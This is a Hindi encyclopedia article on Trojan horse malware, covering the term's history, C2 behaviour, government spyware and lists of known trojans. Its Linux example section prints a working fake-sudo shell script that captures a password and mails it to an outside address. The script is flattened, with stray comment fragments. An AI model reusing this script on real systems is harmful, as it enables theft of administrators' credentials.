ट्रोजन हॉर्स (कंप्यूटिंग)

संगणन में, एक ट्रोजन हॉर्स कोई भी ऐसा मैलवेयर है जो उपयोगकर्ताओं को उसके वास्तविक उद्देश्य के बारे में गुमराह करता है। यह शब्द भ्रामक ट्रोजन हॉर्स की प्राचीन ग्रीक कहानी से लिया गया है ,जिसके कारण ट्रॉय शहर का पतन हुआ। ट्रोजन आमतौर पर सामाजिक अभियान्त्रिकी  के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर दिखने के लिए एक विपत्र संलग्नक निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित विधि भरने के लिए), या सामाजिक संचार माध्यम पर या अन्य जगहों पर किसी नकली विज्ञापन पर क्लिक करके। हालांकि उनका आयभार कुछ भी हो सकता है, कई आधुनिक रूप गुप्तद्वार के रूप में कार्य करते हैं ,एक नियंत्रक से संपर्क करते हैं जो प्रभावित परिकलक तक अनधिकृत पहुंच प्राप्त कर सकते हैं। रैंसमवेयर हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।

परिकलक विषाणु और कृमि के विपरीत, ट्रोजन आमतौर पर खुद को अन्य दस्तावेजों में नवीनता करने का प्रयास नहीं करते हैं या अन्यथा स्वयं को प्रचारित नहीं करते हैं।

शब्द का प्रयोग
यह स्पष्ट नहीं है कि अवधारणा और इसके लिए शब्द का पहली बार उपयोग कब और कहाँ किया गया था,लेकिन 1971 तक पहले यूनिक्स पुस्तिका ने मान लिया था कि इसके पाठक दोनों को जानते हैं:

एक और प्रारंभिक संदर्भ 1974 में मॉलटिक्स परिकलक प्रणाली में भेद्यता के विश्लेषण पर अमेरिकी वायु सेना के संदेश में है।

इसे केन थॉम्पसन द्वारा 1983 के अपने ट्यूरिंग पुरस्कार स्वीकृति व्याख्यान "विश्वासी न्यास पर परावर्तन" में लोकप्रिय बनाया गया था। उपशीर्षक: किसी को किस हद तक एक बयान पर भरोसा करना चाहिए कि एक कार्यक्रम ट्रोजन हॉर्स से मुक्त है? प्रक्रिया सामग्री लिखने वाले लोगों पर भरोसा करना शायद अधिक महत्वपूर्ण है। उन्होंने उल्लेख किया कि वे मॉलटिक्स की सुरक्षा पर एक संदेश से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे।

व्यवहार
एक बार अधिष्ठापित हो जाने पर, ट्रोजन कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। एकाधिक अंतर्जाल पर एक या एक से अधिक आदेश और संयम (C2) परिसेवक संपर्क करते हैं और निर्देशो की प्रतीक्षा करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट समुच्चय का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, अन्य मैलवेयर ट्रोजन को दुर्भावनापूर्ण गतिविधि के लिए प्रतिनिधि के रूप में उपयोग करके संभावित रूप से कब्जा कर सकते हैं

जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए जासूसी के सोफ्टवेयर को कभी-कभी गोववेयर कहा जाता है । गोववेयर आमतौर पर एक ट्रोजन प्रक्रिया सामाग्री है जिसका उपयोग लक्षित परिकलक से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह की प्रक्रियात्मक सामाग्री के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है। गोववेयर ट्रोजन के उदाहरणों में स्विस मिनीपैंजर और मेगापैंजर और जर्मन "राजकीय ट्रोजन" उपनाम R2D2 शामिल है। जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का दोहन करके काम करता है और अन्य अनुप्रयोगों के माध्यम से कूट किए जाने से पहले स्मार्टफोन के आकड़े तक पहुंचता है।

विच्छेदको के बीच बोटनेट की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं, ट्रोजन अधिक आम होते जा रहे हैं। BitDefender द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै"। ट्रोजन का कीड़ों के साथ एक रिश्ता है,क्योंकि वे कीड़ों की मदद से फैलते हैं और उनके साथ अंतर्जाल पर यात्रा करते हैं। बिटडिफेंडर ने कहा है कि लगभग 15% परिकलक एक बॉटनेट के सदस्य हैं, जो आमतौर पर ट्रोजन संक्रमणों द्वारा भर्ती किए जाते हैं।

लिनक्स उदाहरण
ट्रोजन हॉर्स एक परिकलक योजना है जो कुछ स्पष्ट कार्य करने का दावा करता है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करती है। एक सुविधाजनक विकल्प Linux sudo आदेश का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में अनुकृति किया जाता है यदि कोई व्यवस्थापक उस निर्देशिका में होता है और   को निष्पादित करता है, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है। : # stty -echo /bin/echo -n "Password for `whoami`: " read x /bin/echo "" stty echo echo $x | mail -s "`whoami` password" outside@creep.com sleep 1 echo Sorry. rm $0 exit 0 कमांड लाइन आधारित ट्रोजन हॉर्स को रोकने के लिए,   पर्यावरण चर में प्रवेश पूंछ के अंत में स्थित होना चाहिए। उदाहरण के लिए:.
 * 1) sudo
 * 1) Turn off the character echo to the screen.
 * 1) Turn back on the character echo.

निजी और सरकारी

 * एएनओएम - एफबीआई
 * कैओस कंप्यूटर क्लब#Staatstrojaner|0zapftis / r2d2 StaatsTrojaner – DigiTask
 * डार्ककॉमेट - सीआईए / एनएसए
 * फिनफिशर - लेंच आईटी समाधान / गामा इंटरनेशनल
 * हैकिंग टीम# उत्पाद और क्षमताएं | दा विंची / गैलीलियो आरसीएस - हैकिंग टीम
 * जादू लालटेन (सॉफ्टवेयर) - एफबीआई
 * 2020 यूनाइटेड स्टेट्स फेडरल गवर्नमेंट डेटा ब्रीच - फॉरेन इंटेलिजेंस सर्विस (रूस)आरामदायक भालू (संदिग्ध)
 * जरूरत के हिसाब से एक्सेस ऑपरेशंस#क्वांटम अटैक|टीएओ क्वांटम/फॉक्सैसिड - एनएसए
 * योद्धा गौरव - जीसीएचक्यू

सार्वजनिक रूप से उपलब्ध

 * ईजीएबीटीआर - 1980 के दशक के अंत में
 * नेटबस - 1998 (प्रकाशित)
 * मोबमैन द्वारा प्रभात - 1999 (प्रकाशित)
 * पीछे का छिद्र - 1998 (प्रकाशित)
 * बीस्ट (ट्रोजन हॉर्स) - 2002 (प्रकाशित)
 * बिफ्रोस्ट (ट्रोजन हॉर्स) - 2004 (प्रकाशित)
 * डार्ककॉमेट - 2008-2012 (प्रकाशित)
 * ब्लैकहोल शोषण किट - 2012 (प्रकाशित)
 * घोस्ट आरएटी - 2009 (प्रकाशित)
 * मिनीपैंजर और मेगापैंजर - 2009 (प्रकाशित)
 * Leurak द्वारा MEMZ - 2016 (प्रकाशित)

सुरक्षा शोधकर्ताओं द्वारा पता लगाया

 * बारह टोटके - 1990
 * क्लिकबॉट.ए - 2006 (खोजा गया)
 * ज़्यूस (ट्रोजन हॉर्स) - 2007 (खोजा गया)
 * ट्रोजन बैकडोर। फ्लैशबैक - 2011 (खोजा गया)
 * ज़ीरो एक्सेस बॉटनेट - 2011 (खोजा गया)
 * कोबफेस - 2008 (खोजा गया)
 * चोट - 2009 (खोजा गया)
 * कोरफ्लड - 2010 (खोजा गया)
 * टिनी बैंकर ट्रोजन - 2012 (खोजा गया)
 * सोवा - 2022 (खोजा गया)
 * गवाह एंड्रॉइड मैलवेयर - 2015 (खोजा गया)

पूंजीकरण
परिकलक शब्द ट्रोजन हॉर्स प्राचीन शहर ट्रॉय के प्रसिद्ध ट्रोजन हॉर्स से लिया गया है। इस कारण ट्रोजन को अक्सर पूंजीकृत किया जाता है। हालाँकि, जबकि शैली मार्गदर्शिकाएँ और शब्दकोश भिन्न होते हैं, कई सामान्य उपयोग के लिए छोटे अक्षर ट्रोजन का सुझाव देते हैं।

यह भी देखें

 * कंप्यूटर सुरक्षा
 * कोयल का अंडा (रूपक) | कोयल का अंडा (रूपक)
 * साइबर जासूसी
 * नाचने वाले सूअर
 * शोषण (कंप्यूटर सुरक्षा)
 * औद्योगिक जासूसी
 * फ़िशिंग
 * कम से कम विशेषाधिकार का सिद्धांत
 * गोपनीयता-आक्रामक सॉफ्टवेयर
 * दूरस्थ प्रशासन
 * दूरस्थ प्रशासन सॉफ्टवेयर
 * उल्टा कनेक्शन
 * दुष्ट सुरक्षा सॉफ्टवेयर
 * धोखाधड़ी करने वाले
 * तकनीकी सहायता घोटाला
 * कंप्यूटर वायरस और वर्म्स की समयरेखा
 * ज़ोंबी (कंप्यूटर विज्ञान)